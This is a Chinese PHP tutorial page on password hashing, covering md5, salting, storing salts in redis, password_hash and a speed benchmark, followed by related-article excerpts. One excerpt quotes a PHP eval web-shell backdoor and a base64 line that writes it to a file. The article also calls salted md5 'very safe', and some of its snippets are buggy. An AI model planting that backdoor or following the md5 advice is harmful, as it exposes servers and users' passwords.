PHP中散列密码的安全性分析

本文实例讲述了PHP中散列密码的安全性。分享给大家供大家参考,具体如下:

php的基本哈希函数已经不再安全?

php手册中有专门的一个部分来介绍这个问题
http://php.net/manual/zh/faq.passwords.php

很多应用,都是将用户的密码都是直接通过md5加密直接存储到数据库中的,包括我最近在用的开源项目zabbix的web管理界面。

$password = "1234";
$hash = md5($password);
echo $res;

php常用的哈希函数有md5和sha1,这种哈希之后,一般是不可逆的,但是可以重现,也就是说同样的明文,哈希之后的结果是一样的,对于一些简单的明文,是可以通过遍历,然后对照加密之后的密文得到明文的。

网上有流传的“彩虹表”,就是遍历的到的一个非常大的数据库,存储了明文和密文的对照关系,通过查询就能得到密文对应的明文。

http://www.cmd5.com/

这个网站就提供这种服务器,也就说如果黑客“脱裤”成功,拿到用户密码的密文之后,还是有很大的可能性解密得到明文了。

将明文“1234”,通过md5加密之后,在上面的网站是很容易解密出来的。

通过“加盐”,增加破解难度

“加盐”的意思是给明文加上一些数据,然后再进行加密。这样的话,就算明文(用户的密码)比较简单,加盐之后就变得更加复杂一些,然后再加密,这就增加了黑客去解密明文的难度。

$password = "1234";
$salt = "s@jn#.sK_jF3;gg*&";
$hash = md5($password.$salt);
echo $res;

同样的明文“1234”,加了一个比较复杂的“盐”之后,再进行加密,解密的难度就增加了不少,在上面的解密网站是就不能被解密出来了(最起码不付钱是解密不出来的,哈哈哈)。

上面我们对所有的密码都使用的同样的盐,这中方式是不大安全的。比如,张三和李四的密码是一样的,则存储在数据库中的密文也是一样的,这无疑让黑客更容易破解了。

更常使用的方式,是对于不同的用户使用不同的盐进行加密,在用户的注册过程中,生成用户对应的盐,然后进行存储;在用户登录时,取出盐用于加密操作,盐和用户id一一对应。

可以使用php自带的random_bytes生成一定长度的盐

$password = "1234";
$salt = bin2hex(random_bytes(32));
$hash = md5($password.$salt);
echo $res;

关于盐的存储

可以将盐和密文一起存在数据库的用户信息表中,优点是数据库查询取出密码的同时也可以取出盐,进行加密比对操作,一次数据查询就可以搞定,缺点是安全性差,如果黑客“脱裤”成功,则获取密文的同时也获取了对应的盐。

更好的方案是将盐和密文分开存储,比如密文存储在mysql数据库中,盐存储在redis服务器中,这样即使黑客“脱裤”拿到了数据库中的密文,也需要再进一步拿到对应的盐才能进一步破解,安全性更好,不过这样需要进行二次查询,即每次登陆都需要从redis中取出对应的盐,牺牲了一定的性能,提高了安全性。

php5.5中更加安全的解决方案

说php是专为为web设计的语言一点也没错,应该是php开发者也注意到了这个密码保存的问题。

于是php5.5开始,就设计了password_hashing模块,用于密码的哈希和验证。

http://php.net/manual/zh/book.password.php

使用password_hash进行哈希,使用的算法、cost 和盐值作为哈希的一部分返回,所以不用单独保存salt的值,因为它每次都会自己生成salt,所以优点就是“每次加密的结果都不一样”,但是可以放心,加密结果包含了salt信息,password_verify可以正确解析。

$password = "1234";
$hash = password_hash($password,PASSWORD_DEFAULT);

哈希之后的结果,只能使用password_verify进行验证,因此验证密码的功能只能由php语言来实现。

$password = "1234";
$hash = password_hash($password,PASSWORD_DEFAULT);
$res = password_verify($password,$hash);  //验证结果为true

优缺点分析

优点是安全性很高,即使被脱裤,也很难将密文解密,因为同一个密文,每次加密的结果都不一样,所以没法撞库!

password_hash实际上是对crypt和salt的封装,crypt加密比普通的md5和sha1更加复杂,所以耗时也更加多一些,这可以算是一个缺点,对于用户量很大,经常需要进行登录操作的站点,可能会有性能上的影响。还有一点是通用性不强,因为这种方式只适用于php语言,其他语言是没有办法对密文进行操作的。

刚才测试了一下password_hash的性能,吓的半死。。

md5.php

<?php
$stime = microtime(true);
$password = "root123@";
$salt = "83979fklsdfgklu9023*&*(&()#&*(Y*(@&*<:L:%:::>><??11!!^%^$%$%^<>YUIYUIhjkdshfJKH#J#HJK#HKl;dskfs";
for($i=0;$i<100;$i++){
  $res = md5($password);
}
$etime = microtime(true);
echo "stime:$stime<br/>";
echo "etime:$etime<br/>";
echo "cost:".($etime-$stime);

运行结果:

stime:1478265603.1118
etime:1478265603.1229
cost:0.011116981506348

password_hash.php

<?php
$stime = microtime(true);
$password = "root123@";
for($i=0;$i<100;$i++){
  $res = password_hash($password,PASSWORD_DEFAULT);
}
$etime = microtime(true);
echo "stime:$stime<br/>";
echo "etime:$etime<br/>";
echo "cost:".($etime-$stime);

运行结果:

stime:1478265640.382
etime:1478265646.6675
cost:6.2854981422424

如果是安全性要求特别高的情况下,可以使用password_hash的方式,这种情况下一般可以通过其他方式提高服务器性能。

不过,大多是情况下,将salt存储在redis,md5之后的密文存储在mysql的方式已经非常安全了,微笑 :)

PS:关于加密解密感兴趣的朋友还可以参考本站在线工具:

文字在线加密解密工具(包含AES、DES、RC4等):
http://tools.jb51.net/password/txt_encode

MD5在线加密工具:
http://tools.jb51.net/password/CreateMD5Password

在线散列/哈希算法加密工具:
http://tools.jb51.net/password/hash_encrypt

在线MD5/hash/SHA-1/SHA-2/SHA-256/SHA-512/SHA-3/RIPEMD-160加密工具:
http://tools.jb51.net/password/hash_md5_sha

在线sha1/sha224/sha256/sha384/sha512加密工具:
http://tools.jb51.net/password/sha_encode

更多关于PHP相关内容感兴趣的读者可查看本站专题:《php加密方法总结》、《PHP编码与转码操作技巧汇总》、《PHP数学运算技巧总结》、《PHP数组(Array)操作技巧大全》、《php字符串(string)用法总结》、《PHP数据结构与算法教程》、《php程序设计算法总结》及《php正则表达式用法总结》

希望本文所述对大家PHP程序设计有所帮助。

(0)

相关推荐

  • php用户名的密码加密更安全的方法

    php中对用户密码的加密主要有两种方法,一种是利用md5加密,另一种是利用password_hash加密,两种方法中后一种的方法比前一种方法安全很多,几乎不能被黑客破解,但php版本必须在5.5以上.下面介绍两种加密方法如何加密才更安全. 新建一个PHP文件,命名为test.php. 利用md5加密.为了更加安全,可以给用户密码加上随机字符串再使用md5加密,产生随机字符串的函数如下: 假如用户的密码$password为123456,则可以把123456加上随机字符串传入md5函数中进行加密.随

  • 理解php Hash函数,增强密码安全

    1.声明 密码学是一个复杂的话题,我也不是这方面的专家.许多高校和研究机构在这方面都有长期的研究.在这篇文章里,我希望尽量使用简单易懂的方式向你展示一种安全存储Web程序密码的方法. 2."Hash"是做什么的? "Hash将一段数据(小数据或大数据)转换成一段相对短小的数据,如字符串或整数." 这是依靠单向hash函数来完成的.所谓单向是指很难(或者是实际上不可能)将其反转回来.一个常见的hash函数的例子是md5(),它流行于各种计算机语言和系统. 复制代码 代

  • PHP中使用addslashes函数转义的安全性原理分析

    本文实例讲述了PHP中使用addslashes函数转义的安全性原理分析.分享给大家供大家参考.具体分析如下: 先来看一下ECshop中addslashes_deep的原型 复制代码 代码如下: function addslashes_deep($value) {     if (empty($value)) {         return $value;  //如为空,直接返回;     } else {         return is_array($value) ? array_map(

  • php用户密码加密算法分析【Discuz加密算法】

    本文实例讲述了php用户密码加密算法.分享给大家供大家参考,具体如下: 今天在拿Discuz进行二次开发时需要在代码里验证Discuz的用户名密码,结果不小心掉进了坑里,因为Discuz的论坛有两张表来存储用户数据,一张在Discuz的数据库ultrax里面的pre_common_member里面,另一个是存储在了UCenter的数据库ucenter的uc_members表里.花了很大功夫在研究ultrax库里那张pre_common_member的数据,研究它的密码是如何生成的,结果搜了一下发

  • PHP实现的单向散列加密操作示例

    本文实例讲述了PHP实现的单向散列加密操作.分享给大家供大家参考,具体如下: 1.加密文件 <?php //sha1_en.php header("content-type:text/html;charset=utf-8"); $str = "我是张三,能给我个人数据吗"; $salt="123456";//我是唯一不变的salt $sha1=sha1($str.$salt);//或者$sha1=md5($str.$salt); echo

  • PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)

    今天一个客户的服务器频繁被写入: mm.php 内容为: 复制代码 代码如下: <?eval($_POST[c]);?> 最后查到某文件内的第一行为以下代码: 复制代码 代码如下: fputs(fopen(base64_decode("bW0ucGhw"),"w"),base64_decode("PD9ldmFsKCRfUE9TVFtjXSk7Pz4=")); base64_decode("bW0ucGhw") /

  • PHP之密码加密的几种方式

    PHP开发WEB应用程序,经常会完成用户注册信息,注册信息里面包括邮箱和密码的验证问题,这篇文章主要是针对密码加密的技师方式. MD5 相信很多PHP开发者在最先接触PHP的时候,处理密码的首选加密函数可能就是MD5了,我当时就是这样的: 复制代码 代码如下: $password = md5($_POST["password"]); 上面这段代码是不是很熟悉?然而MD5的加密方式目前在PHP的江湖中貌似不太受欢迎了,因为它的加密算法实在是显得有点简单了,而且很多破解密码的站点都存放了很

  • PHP中的密码加密的解决方案总结

    层出不穷的类似事件对用户会造成巨大的影响,因为人们往往习惯在不同网站使用相同的密码,一家"暴库",全部遭殃 一般的解决方案. 1.将明文密码做单向hash $password = md5($_POST["password"]); 2.密码+salt后做单向hash,PHP内置了hash()函数,你只需要将加密方式传给hash()函数就好了.你可以直接指明sha256, sha512, md5, sha1等加密方式 <?php function generate

  • PHP更安全的密码加密机制Bcrypt详解

    前言 我们常常为了避免在服务器受到攻击,数据库被拖库时,用户的明文密码不被泄露,一般会对密码进行单向不可逆加密--哈希. 常见的方式是: 哈希方式 加密密码 md5('123456') e10adc3949ba59abbe56e057f20f883e md5('123456' . ($salt = 'salt')) 207acd61a3c1bd506d7e9a4535359f8a sha1('123456') 40位密文 hash('sha256', '123456') 64位密文 hash('

  • 详谈PHP中的密码安全性Password Hashing

    如果你还在用md5加密,建议看看下方密码加密和验证方式. 先看一个简单的Password Hashing例子: <?php //require 'password.php'; /** * 正确的密码是secret-password * $passwordHash 是hash 后存储的密码 * password_verify()用于将用户输入的密码和数据库存储的密码比对.成功返回true,否则false */ $passwordHash = password_hash('secret-passwo

  • php实现用户注册密码的crypt加密

    本文实例为大家分享了php用户注册密码的加密,供大家参考,具体内容如下 一.代码 1.conn.php <?php $conn = mysql_connect("localhost", "root", "111") or die("连接数据库服务器失败!".mysql_error()); //连接MySQL服务器 mysql_select_db("db_database21",$conn); //选择

随机推荐